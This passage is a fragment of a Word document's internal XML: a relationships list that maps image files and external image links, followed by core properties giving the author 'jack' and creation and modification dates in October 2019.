          <w:szCs w:val="31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31"/>
          <w:szCs w:val="31"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Python is the best language</w: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instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "python-is-the-best-language" </w:instrTex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31"/>
          <w:szCs w:val="31"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF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68" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0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26"/>
          <w:szCs w:val="2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26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>解法一</w: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26"/>
          <w:szCs w:val="26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26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "%E8%A7%A3%E6%B3%95%E4%B8%80" </w:instrTex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26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF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源码下载下来后，由于是基于flask框架，因此先看了看路由文件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routes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py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，大概如下：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@app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before_request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before_request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@app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teardown_request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shutdown_session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exception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None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@app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route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'/'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methods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'GET'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'POST'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@app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route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'/index'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methods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'GET'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'POST'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@login_required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@app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route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'/explore'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@login_required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explore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@app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route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'/logout'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logout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@app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route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'/register'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methods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'GET'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'POST'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register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@app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route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'/user/&lt;username&gt;'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@login_required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user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@app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route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'/edit_profile'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methods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'GET'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'POST'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@login_required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edit_profile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@app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route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'/follow/&lt;username&gt;'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@login_required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follow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@app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route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'/unfollow/&lt;username&gt;'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@login_required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unfollow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这些功能大部分是基于登陆的，因此从注册和登陆相关的代码入手。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@app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route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'/register'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methods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'GET'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'POST'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register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current_user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is_authenticated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redirect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url_for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'index'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form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RegistrationForm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form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validate\_on\_submit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res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mysql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Add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"user"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"NULL"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"'%s'"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form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"'%s'"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form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                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"'%s'"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generate\_password\_hash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form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"''"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"'%s'"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now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res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flash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'Congratulations, you are now a registered user!'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redirect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url_for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'login'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render_template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'register.html'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title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'Register'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form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form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跟进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RegistrationForm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，定义在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forms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py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的第20行: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class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RegistrationForm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FlaskForm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username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StringField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'Username'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validators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DataRequired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email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StringField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'Email'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validators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DataRequired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password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PasswordField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'Password'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validators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DataRequired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password2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PasswordField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'Repeat Password'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validators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DataRequired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EqualTo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'password'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submit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SubmitField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'Register'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validate_username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username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match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"^\[a-zA-Z0-9_\]+$"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username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None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raise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ValidationError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'username has invalid charactor!'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user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mysql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One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"user"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{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"username"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"'%s'"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username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},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"id"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user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!=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raise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ValidationError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'Please use a different username.'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validate_email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email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user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mysql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One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"user"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{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"'%s'"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email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},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"id"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user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!=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raise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ValidationError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'Please use a different email address.'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在这里可以很明显的看到两个验证函数有差别，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validate_username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在进行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mysql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One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前进行了正则匹配的过滤和审核，而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validate_email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仅仅通过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validators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=[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DataRequired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(),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()]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来匹配。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Email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定义在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wtforms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validators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中，相关源码如下：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class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Regexp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Validates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an email address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Note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that this uses a very primitive regular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expression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and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should only be used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instances where you later verify by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other means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such as email activation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lookups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:param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message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Error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message to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raise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case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of a validation error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\_\_init\_\_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message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None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validate_hostname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HostnameValidation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require_tld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True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\_\_init\_\_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'^.+@(\[^.@\]\[^@\]+)$'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IGNORECASE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message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\_\_call\_\_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form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field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message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message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message is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None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message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field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gettext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'Invalid email address.'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match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\_\_call\_\_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form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field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message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not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validate_hostname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match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group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raise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ValidationError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其正则规则为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^.+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@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([^.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@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][^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@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]+)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$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，也就是说对email而言，即使提交如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'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:color w:val="999988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#a@q.com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包含单引号，双引号，注释符等敏感字符的形式也是能通过的。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回到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validate_email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验证函数中：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validate_email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email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user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mysql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One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"user"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{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"'%s'"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email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},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"id"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user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!=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raise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ValidationError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'Please use a different email address.'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跟入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mysql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One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，定义在others.py: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/>
          <w:caps w:val="0"/>
          <w:color w:val="999988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# mysql.One("user", {"email":  "'%s'" % email.data}, \["id"\])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One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tablename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where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={},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feildname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"*"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order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where_symbols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"="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"and"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\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="999988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# self.Sel("user", {"email":  "'%s'" % email.data}, \["id"\], "", "=", l)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sql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tablename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where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feildname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order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where_symbols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try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res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db_session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execute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sql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fetchone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res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None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except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跟入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00A4DB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/>
          <w:caps w:val="0"/>
          <w:color w:val="999988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# self.Sel("user", {"email":  "'%s'" % email.data}, \["id"\], "", "=", l)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tablename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where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={},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feildname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"*"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order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where_symbols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"="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"and"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sql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"select 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sql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join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","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for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feildname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[:-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 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sql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"from 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tablename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 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where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!=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{}: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sql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"where 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join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 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where_symbols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 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                    str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where\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 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l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 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for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where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[:-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order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!=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sql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"order by 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join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","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for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order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[:-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sql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最后拼接出来的sql语句如下：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select id from user where email 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E3116C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'your input email'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结合前面所说的对输入邮箱email形式的验证，这里存在sql注入漏洞。我们设置邮箱为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test'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/**/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="00A4DB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or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/**/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i/>
          <w:color w:val="999988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#@test.com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，则拼接后的sql语句为：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select id from user where email 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E3116C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'test'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/**/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="00A4DB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or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/**/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i/>
          <w:color w:val="999988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#@test.com'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可以看到成功注入。由于此处不能回显数据，因此采用盲注。回到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validate_username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validate_username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username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match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"^\[a-zA-Z0-9_\]+$"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username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None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raise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ValidationError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'username has invalid charactor!'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user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mysql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One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"user"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{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"username"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"'%s'"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username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},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"id"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user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!=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raise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ValidationError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'Please use a different username.'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当查询为真时也即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user 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!=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会出现信息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Please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 use a different username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，结合这点构造出最后的exp.py：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import requests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from bs4 import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BeautifulSoup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url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"http://39.107.32.29:20000/register"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r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requests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get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url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soup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BeautifulSoup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text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"html5lib"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token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soup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find_all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'csrf_token'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get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"value"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notice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"Please use a different email address."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result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database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"(SELECT/**/GROUP\_CONCAT(schema\_name/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA)"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tables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"(SELECT/**/GROUP\_CONCAT(table\_name/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/INFORMATION\_SCHEMA.TABLES/**/WHERE/**/TABLE\_SCHEMA=DATABASE())"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columns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"(SELECT/**/GROUP\_CONCAT(column\_name/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/INFORMATION\_SCHEMA.COLUMNS/**/WHERE/**/TABLE\_NAME=0x666c616161616167)"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data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"(SELECT/**/GROUP_CONCAT(flllllag/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/flaaaaag)"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for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range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100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for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range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32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127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payload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"test'/**/or/**/ascii(substr("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data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",%d,1))=%d#/**/@chybeta.com"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%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print payload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post_data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'csrf_token'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token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'username'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'a'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'email'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:payload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'password'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'a'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'password2'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'a'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'submit'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'Register'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r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requests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post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url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post_data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soup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BeautifulSoup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text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"html5lib"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token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soup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find_all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'csrf_token'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get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"value"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notice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text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result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chr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print result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break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由于在注册部分有csrf_token，因此在每次submit时要记得带上，同时在每次返回的页面中取得下一次的csrf_token。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最后的flag：QWB{us1ng_val1dator_caut1ous}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68" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0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26"/>
          <w:szCs w:val="2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26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>解法二</w: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26"/>
          <w:szCs w:val="26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26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.ctfwp.com/articals/2018qiangwang.html" \l "%E8%A7%A3%E6%B3%95%E4%BA%8C" </w:instrText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26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0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26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF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接着进行代码审计。在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others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py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的最后有这样的内容：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black\_type\_list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eval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execfile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compile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system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open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popen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popen2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popen3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popen4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fdopen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   tmpfile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fchmod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fchown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pipe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chdir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fchdir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chroot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chmod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chown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link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   lchown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listdir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lstat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mkfifo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mknod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mkdir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makedirs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readlink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remove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removedirs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   rename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renames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rmdir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tempnam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tmpnam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unlink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walk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execl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execle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execlp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execv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   execve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execvp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execvpe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exit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fork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forkpty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kill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nice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spawnl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spawnle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spawnlp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spawnlpe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   spawnv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spawnve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spawnvp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spawnvpe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load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loads\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class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FilterException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Exception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\_\_init\_\_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value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FilterException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\_\_init\_\_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'the callable object {value} is not allowed'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format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str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)))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\_hook\_call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func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wrapper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(*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args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**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kwargs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print args\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stack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args\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stack\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[-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black\_type\_list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raise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FilterException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args\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stack\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[-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func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(*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args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**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kwargs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wrapper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load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unpkler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Unpkler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unpkler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dispatch\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REDUCE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\_hook\_call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unpkler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dispatch\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REDUCE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Unpkler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load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我把这部分内容分为两部分；反序列化漏洞以及基本的沙箱逃逸问题。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先忽略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unpkler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dispatch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REDUCE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这一行的内容。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from pickle import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Unpickler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as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Unpkler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load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unpkler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Unpkler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\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="999988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# unpkler.dispatch\[REDUCE\] = \_hook\_call(unpkler.dispatch\[REDUCE\])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Unpkler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load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这里对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进行了反序列化，因此如果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可控即可造成危险。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用下面的脚本(exp4.py)进行序列化payload的生成：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import os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from pickle import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Pickler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as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Pkler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import commands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class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chybeta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\_\_reduce\_\_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"whoami"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,))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evil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chybeta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dump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pkler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Pkler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pkler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dump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evil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with open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"wb"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as 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dump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测试反序列化漏洞(exp5.py):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from pickle import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Unpickler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as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Unpkler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from io import open as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Open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LOAD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unpkler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Unpkler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Unpkler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load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with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Open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"rb"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as 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LOAD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17173575" cy="8315325"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
            <wp:docPr id="6" name="图片 21" descr="IMG_276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1" descr="IMG_27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173575" cy="831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不过没那么简单，源码还设置了沙箱/黑名单来防止某些函数的执行，比如前面的os.system就被禁用了，我们修改exp5.py为进一步的测试：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from os import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*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from sys import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*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from pickle import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*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from io import open as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Open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from pickle import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Unpickler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as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Unpkler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from pickle import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Pickler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as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Pkler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black\_type\_list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eval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execfile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compile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system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open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popen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popen2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popen3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popen4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fdopen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   tmpfile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fchmod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fchown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pipe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chdir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fchdir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chroot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chmod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chown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link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   lchown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listdir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lstat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mkfifo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mknod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mkdir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makedirs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readlink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remove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removedirs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   rename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renames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rmdir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tempnam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tmpnam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unlink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walk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execl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execle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execlp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execv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   execve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execvp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execvpe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exit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fork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forkpty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kill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nice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spawnl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spawnle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spawnlp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spawnlpe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   spawnv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spawnve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spawnvp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spawnvpe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load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loads\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class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FilterException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Exception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\_\_init\_\_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value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FilterException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\_\_init\_\_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'the callable object {value} is not allowed'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format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str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)))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\_hook\_call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func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wrapper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(*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args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**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kwargs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print args\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stack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args\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stack\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[-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black\_type\_list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raise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FilterException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args\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stack\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[-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2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func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(*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args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**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kwargs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wrapper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LOAD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unpkler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Unpkler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unpkler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dispatch\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REDUCE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\_hook\_call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unpkler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dispatch\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REDUCE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Unpkler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load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with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Open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"rb"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as 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LOAD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此时如果简单地想通过前一步生成的test来执行系统命令，会报错。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3810000" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="23" name="图片 22" descr="IMG_277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 descr="IMG_27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考虑其他方法。python中除了os和sys模块有提供命令执行的函数外，还有其他第三方模块，比如commands模块：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14573250" cy="3400425"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="10" name="图片 23" descr="IMG_278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3" descr="IMG_27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因此改写生成序列化文件的exp4.py如下：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import os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from pickle import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Unpickler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as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Unpkler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from pickle import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Pickler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as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Pkler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import commands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class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chybeta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\_\_reduce\_\_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commands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getoutput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"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect((\\"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127.0.0.1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\\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",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\[\\"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bin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sh\\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",\\"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i\\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"\]);'"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,))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evil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chybeta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dump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pkler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Pkler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pkler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dump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evil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with open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"wb"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as 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dump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同时为了进一步利用，我们尝试反弹shell。过程如下，先运行exp4.py生成新的test序列化文件，接着nc监听本地端口，接着运行exp5.py触发序列化漏洞并完成利用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18288000" cy="4772025"/>
            <wp:effectExtent l="0" t="0" r="0" b="13335"/>
            <wp:docPr id="24" name="图片 24" descr="IMG_279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7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477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不过该怎么控制源代码中的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load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的file呢？通过全局搜索关键字，在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Mycache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py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的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FileSystemCache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中有多次引用，比如定义在第137行的get方法：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get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key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filename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\_get\_filename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key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try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with open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'rb'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as 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pickle_time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load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pickle_time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pickle_time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time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    a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load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else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    os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remove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None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except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IOError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OSError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PickleError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None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跟入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_get_filename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方法：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\_get\_filename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key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isinstance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key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text_type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key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key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encode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'utf-8'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\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="999988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# XXX unicode review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hash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md5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key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hexdigest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os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path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join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_path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hash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可以看到将传入的字符串key进行MD5，并将其返回。不过这个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key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在哪里定义？通过全局搜索，不难发现在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Mysession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py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的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open_session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中进行了调用：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class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FileSystemSessionInterface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SessionInterface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...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\_\_init\_\_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cache_dir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threshold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mode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key_prefix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"bdwsessions"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     use_signer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permanent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True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cache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FileSystemCache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cache_dir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threshold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threshold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mode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mode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key_prefix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key_prefix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use_signer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use_signer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permanent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permanent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def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A050F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open_session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app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request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\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="999988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# 从cookie中获取到sid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\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="999988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# 格式 Cookie: session=675b6ec7-95bd-411f-a59d-4c3db5929604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\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="999988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# sid 即为 675b6ec7-95bd-411f-a59d-4c3db5929604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sid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request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cookies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get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app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session\_cookie\_name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not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sid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sid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\_generate\_sid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session_class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sid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sid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permanent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permanent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...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data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cache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get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key_prefix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sid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data is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not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None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session_class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data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sid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sid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session_class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sid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sid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permanent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permanent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...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其中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00A4DB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key_prefix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即为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bdwsessions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，因此假设cookie中的sesssion值为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675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b6ec7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95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bd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411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a59d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c3dbchybeta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，则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00A4DB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key_prefix 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+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 sid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即为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bdwsessions675b6ec7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95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bd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411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a59d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c3dbchybeta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，然后这串字符串进行MD5得到的结果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78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f634977cbacf167dfd9656fe9dd5f3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即为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675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b6ec7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95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bd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411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a59d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c3dbchybeta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对应的session文件名。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同时根据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config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py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SQLALCHEMY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\_DATABASE\_URI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"mysql://root:password@localhost/flask?charset=utf8"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SESSION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\_FILE\_DIR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"/tmp/ffff"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可以知道session文件的保存路径在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tmp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ffff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，以及用户为root，因此具有文件导出的权限的可能性很大。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流程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结合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Python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 is the best language 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中的sql注入漏洞，我们梳理出如下的攻击流程：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0" w:hanging="360"/>
      </w:pP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0" w:hanging="360"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>本地生成序列化文件，并且进行十六进制编码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0" w:hanging="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:hanging="360"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过sql注入漏洞outfile出session文件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0" w:hanging="360"/>
      </w:pP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tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:hanging="360"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>访问index，同时带上session文件对应的session值，触发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open_session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tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:hanging="360"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的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00A4DB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cache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get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tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:hanging="360"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，进行反序列化攻击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假设前面生成的序列化文件存在于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tmp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ffff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chybeta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，建议使用mysql的hex转码来进行十六进制的转换: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mysql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&gt;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select hex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load_file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'/tmp/ffff/chybeta'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into outfile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'/tmp/ffff/exp'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;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Query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OK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,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1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row affected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0.00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sec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)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13287375" cy="2581275"/>
            <wp:effectExtent l="0" t="0" r="1905" b="9525"/>
            <wp:docPr id="26" name="图片 25" descr="IMG_280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 descr="IMG_28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28737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以使用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675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b6ec7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95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bd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411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a59d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c3dbchybeta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作为cookie为例，则其session文件存在于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tmp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ffff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78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f634977cbacf167dfd9656fe9dd5f3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在十六进制的序列化串前面添加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x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，构造邮箱处的注入点：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select id from user where email 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=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'test'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/**/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union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/**/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/**/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0x63636F6D6D616E64730A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../**/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into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/**/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dumpfile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/**/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'/tmp/ffff/78f634977cbacf167dfd9656fe9dd5f3'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="999988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#@test.com'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也即在注册的邮箱处填入：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bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="268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33333"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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6"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>复制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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="E3116C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'/**/union/**/select/**/0x63636F6D6D616E64730A.../**/into/**/dumpfile/**/'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tmp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ffff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="393A34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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="36ACAA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78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f634977cbacf167dfd9656fe9dd5f3'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="999988"/>
          <w:spacing w:val="2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#@test.com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点击submit后出现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Please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 use a different email address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接着在burp中抓取访问index的包，并修改cookie为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复制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675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b6ec7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95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bd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411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f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a59d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="393A34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-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="36ACAA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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="F7F7F7"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>c3dbchybeta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，在自己的vps上监听对应的端口：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183C4"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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18107025" cy="7886700"/>
            <wp:effectExtent l="0" t="0" r="13335" b="7620"/>
            <wp:docPr id="25" name="图片 26" descr="IMG_281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6" descr="IMG_28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10702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flag：QWB{pyth0n1s1ntere3t1ng}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 w:line="24" w:lineRule="atLeast"/>
        <w:ind w:lef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shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>总结: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0" w:hanging="360"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>wtforms.validators的Email类验证不完善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0" w:hanging="360"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>flask的session处理机制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0" w:hanging="360"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>python沙箱逃逸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0" w:hanging="360"/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bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>python反序列化漏洞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0" w:hanging="360"/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2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一点“小小”的脑洞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2A472FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2A472F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E8021A16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8021A1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F5009D89"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5009D8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5E59B234"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E59B23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82C75E3"/>
    <w:rsid w:val="182C7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9">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden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Hyperlink"/>
    <w:basedOn w:val="9"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="9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hyperlink" Target="https://pupiles-1253357925.cos.ap-chengdu.myqcloud.com/q13.PNG" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pupiles-1253357925.cos.ap-chengdu.myqcloud.com/q12.PNG" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xianzhi.aliyun.com/forum/media/upload/picture/20180325210556-416f6304-302d-1.jpeg" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xianzhi.aliyun.com/forum/media/upload/picture/20180325210627-54001108-302d-1.jpeg" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xianzhi.aliyun.com/forum/media/upload/picture/20180325210651-62471a68-302d-1.jpeg" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xianzhi.aliyun.com/forum/media/upload/picture/20180325210611-4aa7837a-302d-1.jpeg" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.GIF"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xianzhi.aliyun.com/forum/media/upload/picture/20180325210703-699fb630-302d-1.jpeg" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xianzhi.aliyun.com/forum/media/upload/picture/20180325210716-71472a80-302d-1.jpeg" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://p3.ssl.qhimg.com/t01f696f6826e2c62f8.jpg" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://p3.ssl.qhimg.com/t019552d837e8c8502c.jpg" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pupiles-1253357925.cos.ap-chengdu.myqcloud.com/q15.PNG" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://p5.ssl.qhimg.com/t01933a8569390d8a27.jpg" TargetMode="External"/><Relationship Id="rId37" 